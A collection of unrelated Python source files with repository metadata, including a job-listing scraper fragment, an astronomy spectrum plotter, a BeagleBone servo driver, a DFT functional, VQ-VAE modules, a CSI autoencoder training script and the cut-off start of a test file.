time.sleep(4)
job_container = driver.find_elements(By.CSS_SELECTOR,".jobTuple.bgWhite.br4.mb-8")
# scraping the details from webpage
for job in job_container:
driver.implicitly_wait(20)
title=job.find_element(By.CSS_SELECTOR,"a.title.fw500.ellipsis").text
company=job.find_element(By.CSS_SELECTOR,"a.subTitle.ellipsis.fleft").text
location=job.find_element(By.CSS_SELECTOR,".fleft.grey-text.br2.placeHolderLi.location").text
try:
exp=job.find_element(By.CSS_SELECTOR,".fleft.grey-text.br2.placeHolderLi.experience").text
except Exception:
exp="0 yrs"
#skills=job.find_element(By.CSS_SELECTOR,".tags.has-description").text
date_string=job.find_element(By.CSS_SELECTOR,"[class^='type br2 fleft']").text
# date_string contains strings like 2 day ago,just now,few hours ago
#jd=job.find_element(By.TAG_NAME,"a").get_attribute("href")
date=re.findall(r'\d+',date_string) #extracting numbers out of the date_string
jobs["title"].append(title)
jobs["company"].append(company)
jobs["location"].append(location)
jobs["experience"].append(exp)
#jobs["skills"].append(skills)
jobs["date"].append(date)
#jobs["jd_url"].append(jd)
jobs["scraper_run_dt_time"].append(datetime.today())
jobs["date"]=date_extract(jobs["date"])
try:
print(type(jobs))
dataframe=get_df_from_dict(jobs)
print(type(dataframe))
dataframe[15:25]
final_df=final_df.append(dataframe)
except:
logging.error("Error in dict_to_df")
now=datetime.today()
dt_time=now.strftime("%H%M%S")
dt=now.strftime("%Y%m%d")
filename="scraped_"+dt+"_"+dt_time
final_df.info()
final_df[40:45]
final_df.to_csv('{}.csv'.format(filename))
driver.quit
task_scrape()
# In[ ]:
| shivanianand/NaukriDataAnalysis | Scraping_final.py | Scraping_final.py | py | 4,365 | python | en | code | 0 | github-code | 36 |
40858491511 | #!/usr/bin/env python
import sys
import fitsio
import healpy
import numpy as np
import scipy as sp
import argparse
import matplotlib.pyplot as plt
from scipy.interpolate import interp1d
from picca.data import forest
from picca.data import delta
from picca import io
if __name__ == '__main__':
parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('--plate', type = int, default = None, required=True,
help = 'Plate of spectrum')
parser.add_argument('--mjd', type = int, default = None, required=True,
help = 'Modified Julian Date of spectrum')
parser.add_argument('--fiberid', type = int, default = None, required=True,
help = 'fiber of spectrum')
parser.add_argument('--drq', type = str, default = None, required=True,
help = 'DRQ file')
parser.add_argument('--nside', type = int, default = 16, required=False,
help = 'healpix nside')
parser.add_argument('--spectrum', type = str, default = None, required=True,
help = 'data directory for all the spectra')
parser.add_argument('--no-project', action="store_true", required=False,
help = 'do not project out continuum fitting modes')
parser.add_argument('--in-dir',type = str,default=None,required=True,
help='data directory')
parser.add_argument('--lambda-min',type = float,default=3600.,required=False,
help='lower limit on observed wavelength [Angstrom]')
parser.add_argument('--lambda-max',type = float,default=5500.,required=False,
help='upper limit on observed wavelength [Angstrom]')
parser.add_argument('--lambda-rest-min',type = float,default=1040.,required=False,
help='lower limit on rest frame wavelength [Angstrom]')
parser.add_argument('--lambda-rest-max',type = float,default=1200.,required=False,
help='upper limit on rest frame wavelength [Angstrom]')
parser.add_argument('--rebin',type = int,default=3,required=False,
help='rebin wavelength grid by combining this number of adjacent pixels (ivar weight)')
parser.add_argument('--mode',type = str,default='pix',required=False,
help='open mode: pix, spec, spcframe')
parser.add_argument('--dla-vac',type = str,default=None,required=False,
help='dla catalog file')
parser.add_argument('--dla-mask',type = float,default=0.8,required=False,
help='lower limit on the DLA transmission. Transmissions below this number are masked')
parser.add_argument('--mask-file',type = str,default=None,required=False,
help='Path to file to mask regions in lambda_OBS and lambda_RF. In file each line is: region_name region_min region_max (OBS or RF) [Angstrom]')
parser.add_argument('--flux-calib',type = str,default=None,required=False,
help='Path to file to previously produced picca_delta.py file to correct for multiplicative errors in the flux calibration')
parser.add_argument('--ivar-calib',type = str,default=None,required=False,
help='Path to previously produced picca_delta.py file to correct for multiplicative errors in the pipeline inverse variance calibration')
args = parser.parse_args()
### forest args
forest.lmin = np.log10(args.lambda_min)
forest.lmax = np.log10(args.lambda_max)
forest.lmin_rest = np.log10(args.lambda_rest_min)
forest.lmax_rest = np.log10(args.lambda_rest_max)
forest.rebin = args.rebin
forest.dll = args.rebin*1e-4
forest.dla_mask = args.dla_mask
### Get Healpy pixel of the given QSO
objs = {}
ra,dec,zqso,thid,plate,mjd,fid = io.read_drq(args.drq,0.,1000.,keep_bal=True)
cut = (plate==args.plate) & (mjd==args.mjd) & (fid==args.fiberid)
if cut.sum()==0:
print("Object not in drq")
sys.exit()
ra = ra[cut]
dec = dec[cut]
zqso = zqso[cut]
thid = thid[cut]
plate = plate[cut]
mjd = mjd[cut]
fid = fid[cut]
phi = ra
th = sp.pi/2.-dec
pix = healpy.ang2pix(args.nside,th,phi)
### Get data
data = None
if args.mode == "pix":
data = io.read_from_pix(args.in_dir,pix[0],thid, ra, dec, zqso, plate, mjd, fid, order=None, log=None)
elif args.mode in ["spec","corrected-spec"]:
data = io.read_from_spec(args.in_dir,thid, ra, dec, zqso, plate, mjd, fid, order=None, mode=args.mode,log=None)
elif args.mode =="spcframe":
data = io.read_from_spcframe(args.in_dir,thid, ra, dec, zqso, plate, mjd, fid, order=None, mode=args.mode, log=None)
if data is None:
print("Object not in in_dir")
sys.exit()
else:
data = data[0]
### Correct multiplicative flux calibration
if (args.flux_calib is not None):
try:
vac = fitsio.FITS(args.flux_calib)
head = vac[1].read_header()
ll_st = vac[1]['loglam'][:]
st = vac[1]['stack'][:]
w = (st!=0.)
forest.correc_flux = interp1d(ll_st[w],st[w],fill_value="extrapolate")
vac.close()
except:
print(" Error while reading flux_calib file {}".format(args.flux_calib))
sys.exit(1)
### Correct multiplicative pipeline inverse variance calibration
if (args.ivar_calib is not None):
try:
vac = fitsio.FITS(args.ivar_calib)
ll = vac[2]['LOGLAM'][:]
eta = vac[2]['ETA'][:]
forest.correc_ivar = interp1d(ll,eta,fill_value="extrapolate",kind="nearest")
vac.close()
except:
print(" Error while reading ivar_calib file {}".format(args.ivar_calib))
sys.exit(1)
### Get the lines to veto
usr_mask_obs = None
usr_mask_RF = None
usr_mask_RF_DLA = None
if (args.mask_file is not None):
try:
usr_mask_obs = []
usr_mask_RF = []
usr_mask_RF_DLA = []
with open(args.mask_file, 'r') as f:
loop = True
for l in f:
if (l[0]=='#'): continue
l = l.split()
if (l[3]=='OBS'):
usr_mask_obs += [ [float(l[1]),float(l[2])] ]
elif (l[3]=='RF'):
usr_mask_RF += [ [float(l[1]),float(l[2])] ]
elif (l[3]=='RF_DLA'):
usr_mask_RF_DLA += [ [float(l[1]),float(l[2])] ]
else:
raise
usr_mask_obs = np.log10(np.asarray(usr_mask_obs))
usr_mask_RF = np.log10(np.asarray(usr_mask_RF))
usr_mask_RF_DLA = np.log10(np.asarray(usr_mask_RF_DLA))
if usr_mask_RF_DLA.size==0:
usr_mask_RF_DLA = None
except:
print(" Error while reading mask_file file {}".format(args.mask_file))
sys.exit(1)
### Veto lines
if not usr_mask_obs is None:
if ( usr_mask_obs.size+usr_mask_RF.size!=0):
data.mask(mask_obs=usr_mask_obs , mask_RF=usr_mask_RF)
### Correct for DLAs
if not args.dla_vac is None:
print("adding dlas")
dlas = io.read_dlas(args.dla_vac)
for p in data:
for d in data[p]:
if d.thid in dlas:
for dla in dlas[d.thid]:
data.add_dla(dla[0],dla[1],usr_mask_RF_DLA)
### Get delta from picca_delta
done_delta = None
f = args.spectrum+"/delta-"+str(pix[0])+".fits.gz"
hdus = fitsio.FITS(f)
ds = [delta.from_fitsio(h) for h in hdus[1:]]
for d in ds:
if (d.plate==args.plate) and (d.mjd==args.mjd) and (d.fid==args.fiberid):
d.project()
done_delta = d
hdus.close()
break
if done_delta is None:
hdus.close()
print("Object not in spectrum")
sys.exit()
### Observed l
plt.errorbar(10**data.ll,data.fl,linewidth=2,color='black')
plt.errorbar(10**done_delta.ll,done_delta.co,linewidth=4,color='red')
plt.xlabel(r'$\lambda_{\mathrm{Obs.}} \, [\mathrm{\AA}]$',fontsize=30)
plt.ylabel(r'$f \, [10^{-19} \mathrm{W \, m^{-2} \, nm^{-1}}]$',fontsize=30)
plt.grid()
plt.show()
### RF l
plt.errorbar(10**data.ll/(1.+done_delta.zqso),data.fl,linewidth=4,color='black')
plt.errorbar(10**done_delta.ll/(1.+done_delta.zqso),done_delta.co,linewidth=4,color='red')
plt.xlabel(r'$\lambda_{\mathrm{R.F.}} \, [\mathrm{\AA}]$',fontsize=30)
plt.ylabel(r'$f \, [10^{-19} \mathrm{W \, m^{-2} \, nm^{-1}}]$',fontsize=30)
plt.grid()
plt.show()
| vserret/picca | tutorials/picca_plotSpec.py | picca_plotSpec.py | py | 8,731 | python | en | code | 0 | github-code | 36 |
19173841991 | #max duty_ns is 20ms and min is 5ms. We want 180 degrees (divisions)#Some variables
# This values may change depending on your servos
MIN_DUTY_NS = 500000
MAX_DUTY_NS = 2000000
PWM_FRECUENCY = 50 #hz
DEGREE_TO_NS = (MAX_DUTY_NS-MIN_DUTY_NS)/180
PWM_PATH = "/sys/class/pwm/"
# -------------- from bonescript's bone.js ----------------------
gpio0 = 0
gpio1 = gpio0+32
gpio2 = gpio1+32
gpio3 = gpio2+32
pwm_pins = {
"P8_13": { "name": "EHRPWM2B", "gpio": gpio0+23, "mux": "gpmc_ad9", "eeprom": 15, "pwm" : "ehrpwm.2:1" },
"P8_19": { "name": "EHRPWM2A", "gpio": gpio0+22, "mux": "gpmc_ad8", "eeprom": 14, "pwm" : "ehrpwm.2:0" },
"P9_14": { "name": "EHRPWM1A", "gpio": gpio1+18, "mux": "gpmc_a2", "eeprom": 34, "pwm" : "ehrpwm.1:0" },
"P9_16": { "name": "EHRPWM1B", "gpio": gpio1+19, "mux": "gpmc_a3", "eeprom": 35, "pwm" : "ehrpwm.1:1" },
"P9_31": { "name": "SPI1_SCLK", "gpio": gpio3+14, "mux": "mcasp0_aclkx", "eeprom": 65 , "pwm": "ehrpwm.0:0"},
"P9_29": { "name": "SPI1_D0", "gpio": gpio3+15, "mux": "mcasp0_fsx", "eeprom": 61 , "pwm": "ehrpwm.0:1"},
"P9_42": { "name": "GPIO0_7", "gpio": gpio0+7, "mux": "ecap0_in_pwm0_out", "eeprom": 4, "pwm": "ecap.0"},
"P9_28": { "name": "SPI1_CS0", "gpio": gpio3+17, "mux": "mcasp0_ahclkr", "eeprom": 63, "pwm": "ecap.2" },
}
class Servo:
def attach(self, pin):
if not pin in pwm_pins:
raise Exception('Pin ' + pin + ' is not pwm capable')
else:
self.__pin = PWM_PATH+pwm_pins[pin]["pwm"]
val = open(self.__pin + "/request").read()
if val.find('free') < 0:
raise Exception('Pin ' + pin + ' is already in use')
self.__lastValue = 0
open(self.__pin + "/request", 'w').write("1")
open(self.__pin + "/run", 'w').write("0")
open(self.__pin + "/period_freq", 'w').write(str(PWM_FRECUENCY))
open(self.__pin + "/duty_ns", 'w').write(str(MIN_DUTY_NS)) #init to 0 degree
open(self.__pin + "/run", 'w').write("1")
self.__attached = True
def write(self, value):
duty_ns = MIN_DUTY_NS + value * DEGREE_TO_NS
self.__lastValue = value
open(self.__pin + "/duty_ns", 'w').write(str(duty_ns))
def writeMicroseconds(self, value):
open(self.__pin + "/duty_ns", 'w').write(str(value)+"000") #micro to nano
def read(self):
return self.__lastValue
def attached(self):
return self.__attached
def detach(self):
open(self.__pin + "/run", 'w').write("0")
open(self.__pin + "/request", 'w').write("0")
self.__attached = False
| maxpowel/BeagleBone-Tools | servo/servo.py | servo.py | py | 2,482 | python | en | code | 20 | github-code | 36 |
6394496653 | # Copyright (c) 2023 Graphcore Ltd. All rights reserved.
# The functional definition in this file was ported to Python
# from XCFun, which is Copyright Ulf Ekström and contributors 2009-2020
# and provided under the Mozilla Public License (v2.0)
# see also:
# - https://github.com/dftlibs/xcfun
# - https://github.com/dftlibs/xcfun/blob/master/LICENSE.md
import jax.numpy as jnp
import jax
import numpy as np
def __b88(a, gaa):
# precompute
c1 = (4.0 / 3.0)
c2 = (-8.0 / 3.0)
c3 = (-3.0 / 4.0) * (6.0 / np.pi) ** (1.0 / 3.0) * 2
d = 0.0042
d2 = d * 2.
d12 = d *12.
# actual compute
log_a = jnp.log(a/2)
na43 = jnp.exp(log_a * c1)
chi2 = gaa / 4* jnp.exp(log_a * c2 )
chi = jnp.exp(jnp.log( chi2 ) / 2 )
b88 = -(d * na43 * chi2) / (1.0 + 6*d * chi * jnp.arcsinh(chi)) *2
slaterx_a = c3 * na43
return slaterx_a + b88
| graphcore-research/pyscf-ipu | pyscf_ipu/exchange_correlation/b88.py | b88.py | py | 999 | python | en | code | 31 | github-code | 36 |
39099180403 | def palindrome(string):
try:
if len(string) == 0:
raise ValueError("We cannot catch a void string")
return string == string[::-1]
except ValueError as ex:
print(ex)
return False
def main():
try:
# print(palindrome(121))
print(palindrome(""))
except TypeError as e:
print(f"Only we can catch strings. Error: {e}. This is bad.")
if __name__ == "__main__":
main() | ArturoCBTyur/Prueba_Nueva | exceptions.py | exceptions.py | py | 452 | python | en | code | 0 | github-code | 36 |
35001315098 | from ipywidgets import Box, HBox, VBox, FloatSlider, FloatProgress, Label, Layout
s1 = FloatSlider(description='Apple', min=-5, max=5, step=0.01, value=0, layout=Layout(width='90%'))
s2 = FloatSlider(description='Horse', min=-5, max=5, step=0.01, value=0, layout=Layout(width='90%'))
s3 = FloatSlider(description='Flower', min=-5, max=5, step=0.01, value=0, layout=Layout(width='90%'))
s4 = FloatSlider(description='Car', min=-5, max=5, step=0.01, value=0, layout=Layout(width='90%'))
p1 = FloatProgress(min=0, max=1, step=0.01, value=0)
p2 = FloatProgress(min=0, max=1, step=0.01, value=0)
p3 = FloatProgress(min=0, max=1, step=0.01, value=0)
p4 = FloatProgress(min=0, max=1, step=0.01, value=0)
l1 = Label(value="0.00")
l2 = Label(value="0.00")
l3 = Label(value="0.00")
l4 = Label(value="0.00")
import numpy as np
values = np.array([0.0, 0.0, 0.0, 0.0])
def softmax(i):
return np.exp(values[i]) / np.sum(np.exp(values))
def set_values():
l1.value = "%.2f" % softmax(0)
l2.value = "%.2f" % softmax(1)
l3.value = "%.2f" % softmax(2)
l4.value = "%.2f" % softmax(3)
p1.value = softmax(0)
p2.value = softmax(1)
p3.value = softmax(2)
p4.value = softmax(3)
def on_value_change(change):
if change.owner == s1:
values[0] = change.new
if change.owner == s2:
values[1] = change.new
if change.owner == s3:
values[2] = change.new
if change.owner == s4:
values[3] = change.new
set_values()
s1.observe(on_value_change, names='value')
s2.observe(on_value_change, names='value')
s3.observe(on_value_change, names='value')
s4.observe(on_value_change, names='value')
def main():
set_values()
left_box = VBox([s1, s2, s3, s4], layout=Layout(width='50%'))
middle_box = VBox([p1, p2, p3, p4])
right_box = VBox([l1, l2, l3, l4])
return HBox([left_box, middle_box, right_box])
if __name__ == "__main__":
main() | CaptainProton42/MNISTFromScratch | media/softmax_widget.py | softmax_widget.py | py | 1,890 | python | en | code | 1 | github-code | 36 |
9195714863 | import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
from math import sqrt
def wn_conv1d(*args, **kwargs):
return nn.utils.weight_norm(nn.Conv1d(*args, **kwargs))
def wn_conv_transpose1d(*args, **kwargs):
return nn.utils.weight_norm(nn.ConvTranspose1d(*args, **kwargs))
def wn_linear(*args, **kwargs):
return nn.Linear(*args, **kwargs)
class BaseQuantize(nn.Module):
def embed_code(self, embed_id):
raise NotImplementedError
class Quantize(BaseQuantize):
def __init__(self, dim, n_embed, decay=0.999, eps=1e-5):
super().__init__()
self.dim = dim
self.n_embed = n_embed
self.decay = decay
self.eps = eps
embed = torch.randn(dim, n_embed)
self.register_buffer('embed', embed)
self.register_buffer('cluster_size', torch.zeros(n_embed))
self.register_buffer('embed_avg', embed.clone())
def forward(self, input):
flatten = input.reshape(-1, self.dim)
dist = (
flatten.pow(2).sum(1, keepdim=True)
- 2 * flatten @ self.embed
+ self.embed.pow(2).sum(0, keepdim=True)
)
_, embed_ind = (-dist).max(1)
embed_onehot = F.one_hot(embed_ind, self.n_embed).type(flatten.dtype)
embed_ind = embed_ind.view(*input.shape[:-1])
quantize = self.embed_code(embed_ind)
if self.training:
self.cluster_size.data.mul_(self.decay).add_(
1 - self.decay, embed_onehot.sum(0)
)
embed_sum = flatten.transpose(0, 1) @ embed_onehot
self.embed_avg.data.mul_(self.decay).add_(1 - self.decay, embed_sum)
n = self.cluster_size.sum()
cluster_size = (
(self.cluster_size + self.eps) / (n + self.n_embed * self.eps) * n
)
embed_normalized = self.embed_avg / cluster_size.unsqueeze(0)
self.embed.data.copy_(embed_normalized)
diff = (quantize.detach() - input).pow(2).mean()
quantize = input + (quantize - input).detach()
return quantize, diff, embed_ind
def embed_code(self, embed_id):
return F.embedding(embed_id, self.embed.transpose(0, 1))
class DecomposedQuantize(BaseQuantize):
def __init__(self, length, dim, n_embed, decay=0.999, eps=1e-5):
super().__init__()
self.dim = dim
self.n_embed = n_embed
self.quantizations = nn.ModuleList([Quantize(dim, n_embed, decay, eps) for _ in range(length)])
def forward(self, input):
out = torch.empty_like(input)
diff = None
ids = torch.empty(*input.shape[:-1], dtype=torch.long, device=input.device)
for i in range(input.size(1)):
quant, diff, code = self.quantizations[i](input[:, i])
out[:, i] = quant
ids[:, i] = code
if diff is None:
diff = diff
else:
diff += diff
return out, diff / len(self.quantizations), ids
def embed_code(self, embed_id):
out = torch.empty(*embed_id.size(), self.dim, dtype=torch.float, device=embed_id.device)
for i in range(embed_id.size(1)):
out[:, i] = self.quantizations[i].embed_code(embed_id[:, i])
return out
class SlicedQuantize(nn.Module):
def __init__(self, d_slice, dim, **kwargs):
super().__init__()
self.dim = dim // d_slice
self.quantize = Quantize(dim=self.dim, **kwargs)
self.d_slice = d_slice
def forward(self, input):
shape = input.size()
input = input.reshape(*input.shape[:-2], -1, self.dim)
z, diff, ids = self.quantize(input)
z = z.view(shape)
return z, diff, ids
class CategoricalNoise(nn.Module):
def __init__(self, n_classes, p):
super().__init__()
self.n_classes = n_classes
self.p = p
def forward(self, input):
if self.training:
mask = (torch.rand(input.shape, device=input.device) > self.p).type(input.dtype)
noise = torch.randint_like(input, 0, self.n_classes)
return input * mask + (1 - mask) * noise
else:
return input
class GeometricCategoricalDropout(nn.Module):
def __init__(self, n, q, alpha):
super().__init__()
if not (0 < q < 1):
raise ValueError('q must be a value 0 < ... < 1')
self.a = 1 / (((q ** (n + 1) - 1) / (q - 1)) - 1)
self.n = n
self.q = q
self.alpha = alpha
#
# self.probs = 1 - alpha * (1 - torch.full([n], self.a) * torch.pow(self.q, (torch.arange(n) + 1).type(torch.float)))
# self.m = torch.distributions.Bernoulli(self.probs)
def forward(self, input):
assert input.max() <= self.n
if self.training:
probs = 1 - torch.pow(self.q, input.type(torch.float))
else:
probs = torch.zeros_like(input)
mask = (torch.rand(input.shape, device=input.device) <= probs).type(input.dtype)
return mask
class Noise(nn.Module):
def __init__(self, alpha=0.1):
super().__init__()
self.alpha = alpha
def forward(self, input):
if not self.training:
return input
return input + self.alpha * torch.randn_like(input)
class ResBlock(nn.Module):
def __init__(self, in_channel, channel, kernel_size=3, padding=1, dilation=1):
super().__init__()
self.conv = nn.Sequential(
nn.ELU(),
nn.Conv1d(in_channel, channel, kernel_size=kernel_size, padding=padding, dilation=dilation),
nn.ELU(),
nn.Conv1d(channel, in_channel, kernel_size=1),
)
def forward(self, input):
out = self.conv(input)
out += input
return out
class ChannelWiseLayerNorm(nn.Module):
def __init__(self, channels):
super().__init__()
self.ln = nn.LayerNorm(channels)
def forward(self, input):
shape = input.size()
input = input.view(shape[0], shape[1], -1).transpose(1, 2)
input = self.ln(input)
input = input.transpose(1, 2).view(shape)
return input
class Attention(nn.Module):
def __init__(self, in_dim, key_query_dim, value_dim, n_heads=1, tau=1.0):
super().__init__()
self.query_w = wn_linear(in_dim, key_query_dim)
self.key_w = wn_linear(in_dim, key_query_dim)
self.value_w = wn_linear(in_dim, value_dim)
self.n_heads = n_heads
self.kq_head_dim = key_query_dim // n_heads
self.val_head_dim = value_dim // n_heads
self.tau = tau
def forward(self, query, key):
bs, _, l = query.size()
query_ = query.transpose(1, 2)
key_ = key.transpose(1, 2)
def reshape(x, head_dim):
return x.view(bs, -1, self.n_heads, head_dim).transpose(1, 2)
query = reshape(self.query_w(query_), self.kq_head_dim)
key = reshape(self.key_w(key_), self.kq_head_dim).transpose(2, 3)
value = reshape(self.value_w(key_), self.val_head_dim)
attn = (query @ key) / sqrt(self.kq_head_dim)
attn = attn / self.tau
attn = F.softmax(attn, dim=-1)
out = attn @ value
out = out.transpose(1, 2).reshape(
bs, l, self.n_heads * self.val_head_dim
)
out = out.permute(0, 2, 1)
return out
class EqualizedConv1d(nn.Module):
def __init__(self, c_in, c_out, kernel_size, stride=1, padding=0, bias=True):
super().__init__()
# define the weight and bias if to be used
self.weight = nn.Parameter(nn.init.normal_(
torch.empty(c_out, c_in, *nn.modules.utils._single(kernel_size))
))
self.use_bias = bias
self.stride = stride
self.pad = padding
if self.use_bias:
self.bias = nn.Parameter(torch.FloatTensor(c_out).fill_(0))
fan_in = np.prod(nn.modules.utils._single(kernel_size)) * c_in # value of fan_in
self.scale = np.sqrt(2) / np.sqrt(fan_in)
def forward(self, x):
return F.conv1d(input=x,
weight=self.weight * self.scale, # scale the weight on runtime
bias=self.bias if self.use_bias else None,
stride=self.stride,
padding=self.pad)
class EqualizedConvTranspose1d(nn.Module):
def __init__(self, c_in, c_out, kernel_size, stride=1, padding=0, bias=True):
super().__init__()
self.weight = nn.Parameter(torch.nn.init.normal_(
torch.empty(c_in, c_out, *nn.modules.utils._single(kernel_size))
))
self.use_bias = bias
self.stride = stride
self.pad = padding
if self.use_bias:
self.bias = nn.Parameter(torch.FloatTensor(c_out).fill_(0))
fan_in = c_in # value of fan_in for deconv
self.scale = np.sqrt(2) / np.sqrt(fan_in)
def forward(self, x):
return F.conv_transpose1d(input=x,
weight=self.weight * self.scale, # scale the weight on runtime
bias=self.bias if self.use_bias else None,
stride=self.stride,
padding=self.pad)
class EqualizedLinear(nn.Module):
def __init__(self, c_in, c_out, bias=True):
"""
Linear layer modified for equalized learning rate
"""
from numpy import sqrt
super().__init__()
self.weight = nn.Parameter(torch.nn.init.normal_(
torch.empty(c_out, c_in)
))
self.use_bias = bias
if self.use_bias:
self.bias = nn.Parameter(torch.FloatTensor(c_out).fill_(0))
fan_in = c_in
self.scale = sqrt(2) / sqrt(fan_in)
def forward(self, x):
return F.linear(x, self.weight * self.scale,
self.bias if self.use_bias else None)
if __name__ == '__main__':
n = 4096
do = GeometricCategoricalDropout(n, 0.998, 1.0)
i = 10000
res = torch.zeros(n)
for j in range(i):
sample = torch.randint(0, n, [128])
out = do(sample)
for k, m in enumerate(out):
if m:
res[sample[k]] += 1
res /= i
import numpy as np
import matplotlib.pyplot as plt
plt.plot(np.arange(n), res.numpy())
plt.ylim(bottom=0)
plt.show() | kklemon/text-gan-experiments | legacy/vq_vae_text/vq_vae_text/modules.py | modules.py | py | 10,464 | python | en | code | 0 | github-code | 36 |
958022852 | #!/usr/bin/env python3
"""An Implement of an autoencoder with pytorch.
This is the template code for 2020 NIAC https://naic.pcl.ac.cn/.
The code is based on the sample code with tensorflow for 2020 NIAC and it can only run with GPUS.
Note:
1.This file is used for designing the structure of encoder and decoder.
2.The neural network structure in this model file is CsiNet, more details about CsiNet can be found in [1].
[1] C. Wen, W. Shih and S. Jin, "Deep Learning for Massive MIMO CSI Feedback", in IEEE Wireless Communications Letters, vol. 7, no. 5, pp. 748-751, Oct. 2018, doi: 10.1109/LWC.2018.2818160.
3.The output of the encoder must be the bitstream.
"""
import numpy as np
import h5py
import torch
from transformer import *
from dataloader import *
from loss import *
import os
import torch.nn as nn
import pickle
import random
from copy import deepcopy
from util import *
def save_obj(obj, name ):
with open( name + '.pkl', 'wb') as f:
pickle.dump(obj, f, pickle.HIGHEST_PROTOCOL)
def load_obj(name ):
with open( name + '.pkl', 'rb') as f:
return pickle.load(f)
# Parameters for training
torch.backends.cudnn.benchmark=True
np.set_printoptions(suppress=True)
os.environ["CUDA_VISIBLE_DEVICES"] = '0'
use_single_gpu = True # select whether using single gpu or multiple gpus
torch.manual_seed(1)
batch_size = 16
epochs = 8000
learning_rate = 1e-3
num_workers = 4
print_freq = 3200 # print frequency (default: 60)
# parameters for data
# feedback_bits = 48 # sim2 = 0.26814688715868884, multi2 = 2.3217122101795313, multi_div_sim_2 = 8.658359732535498
feedback_bits = 48
B = 2
size_packet = 100
NUM_RX = 4
NUM_TX = 32
NUM_DELAY = 32
NUM_SAMPLE_TRAIN = 4000
def norm_data(x, num_sample, num_rx, num_tx, num_delay):
x2 = np.reshape(x, [num_sample, num_rx * num_tx * num_delay * 2])
x_max = np.max(abs(x2), axis=1)
x_max = x_max[:,np.newaxis]
x3 = x2 / x_max / 2.0
y = np.reshape(x3, [num_sample, num_rx, num_tx, num_delay, 2])
return y
# Model construction
model = AutoEncoder(feedback_bits=48, dropout=0.1)
# model.encoder.load_state_dict(torch.load('submit_pt/encoder_2.pth.tar')['state_dict'])
# model.decoder.load_state_dict(torch.load('submit_pt/generator_2.pth.tar')['state_dict'])
if use_single_gpu:
model = model.cuda()
else:
# DataParallel will divide and allocate batch_size to all available GPUs
model = torch.nn.DataParallel(model).cuda()
import scipy.io as scio
criterion = SmiLoss()
optimizer = torch.optim.AdamW(model.parameters(), lr=learning_rate)
"""
scheduler = WarmUpCosineAnnealingLR(optimizer=optimizer,
T_max=epochs * len(train_loader),
T_warmup=epochs//20 * len(train_loader),
eta_min=1e-6)
"""
data_train = h5py.File('data/H2_32T4R.mat', 'r')
data_train = np.transpose(data_train['H2_32T4R'][:])
data_train = data_train[:, :, :, :, np.newaxis]
data_train = np.concatenate([data_train['real'], data_train['imag']], 4) # 500 4 32 32 2
# data_train = np.reshape(data_train, [NUM_SAMPLE_TRAIN, NUM_RX* NUM_TX, NUM_DELAY* 2, 1])
# x_train = norm_data(data_train, NUM_SAMPLE_TRAIN, NUM_RX, NUM_TX, NUM_DELAY)
data_train = data_train.astype(np.float32)
x_train = data_train
x_test = data_train
"""
x_test = x_test[1000:,:,:,:]
"""
x_train_hat = np.transpose(x_train, (0,3,1,2,4)).reshape(-1, 32, 256)
x_train_paterns = np.unique((np.sum(np.abs(x_train_hat), axis=2) != 0).astype(np.float32), axis=0)
# dataLoader for training
train_dataset = DatasetFolder(x_train, data_an=True)
print(train_dataset.__len__())
train_loader = torch.utils.data.DataLoader(
train_dataset, batch_size=batch_size, shuffle=True, pin_memory=True, num_workers=num_workers)
def random_cutmix(x):
a = x[:,:,:,:16,:]
b = x[:,:,:,16:,:]
idx = [i for i in range(a.size(0))]
random.shuffle(idx)
res = torch.cat([a,b[idx]], dim=3)
return res
def random_mixup(x, num=3):
weight = np.random.randn(num)
weight = weight / np.sum(weight)
res = x * weight[0]
for i in range(1, num):
idx = [i for i in range(x.size(0))]
random.shuffle(idx)
res += x[idx] * weight[i]
return res
best_loss = 100000
"""
scheduler = WarmUpCosineAnnealingLR(optimizer=optimizer,
T_max=epochs * len(train_loader),
T_warmup=epochs//20 * len(train_loader),
eta_min=1e-6)
"""
print('----', len(train_loader))
for epoch in range(epochs):
if epoch == 200:
for param_group in optimizer.param_groups:
param_group['lr'] = learning_rate * 0.1
# model training
model.train()
total_loss = []
for i, x in enumerate(train_loader):
input = x
input = input.cuda()
# compute output
output = model(input)
loss_list = criterion(output, input, epoch=epoch)
loss = sum(loss_list[1:])
total_loss.append([item.detach().cpu().numpy()*input.size(0) for item in loss_list])
optimizer.zero_grad()
loss.backward()
optimizer.step()
if i % print_freq == 0:
print('Epoch: [{0}][{1}/{2}]\t'
'Loss {loss:.6f}\t'.format(
epoch, i, len(train_loader), loss=loss.item()))
# model evaluating
total_loss = np.sum(np.array(total_loss), axis=0) / len(train_dataset)
print('train loss:{}, other loss:{}\t'.format(total_loss[1], total_loss[2]))
model.eval()
total_loss = []
totalNMSE = 0
y_test = []
count = 0
if epoch%1==0:
with torch.no_grad():
for idx in range(int(4000 / size_packet)):
x = np.random.randint(2, size=(size_packet,feedback_bits))
x = torch.from_numpy(x)
x = x.cuda()
"""
B,_,_,_ = x.size()
x_var = torch.mean((x.view(B,126,-1).detach() - 0.5)**2,dim = -1)
x_sort = torch.sort(-x_var,dim = -1)[1] + torch.arange(B).unsqueeze(-1).to(x_var.device)*126
x_sort = x_sort.view(-1)
x = x.view(B*126,128,2)
input = torch.index_select(x, 0, x_sort).view(B,2,126,128)
"""
input = x
output = model.decoder(input) # bx4x32x32x2
output = output.detach().cpu().numpy()
if idx == 0:
output_all = output
else:
output_all = np.concatenate([output_all, output], axis=0)
new_output_all = output_all
real = x_test[:,:,:,:,0] + x_test[:,:,:,:,1]*1j
fake = new_output_all[:,:,:,:,0] + new_output_all[:,:,:,:,1]*1j
sim_1, multi_1, multi_div_sim_1 = K_nearest(real, fake, NUM_RX, NUM_TX, NUM_DELAY, 2)
print('sim:{}, multi:{}, multi_div_sim_1:{}'.format(sim_1, multi_1, multi_div_sim_1))
if multi_div_sim_1 < best_loss:
modelSave2 = './submit_pt/generator_2.pth.tar'
torch.save({'state_dict': model.decoder.state_dict(), }, modelSave2)
modelSave2 = './submit_pt/encoder_2.pth.tar'
torch.save({'state_dict': model.encoder.state_dict(), }, modelSave2)
print("Model saved")
best_loss = multi_div_sim_1
| China-ChallengeHub/oppo_0.71 | trainer2.py | trainer2.py | py | 7,400 | python | en | code | 1 | github-code | 36 |
71599661864 | import io
import unittest
from glop.host import Host
import glop.tool
from .host_fake import FakeHost
SIMPLE_GRAMMAR = "grammar = anything*:as end -> join('', as) ,"
class ToolTests(unittest.TestCase):
maxDiff = None
def check_call_and_return_files(self, host, args, files):
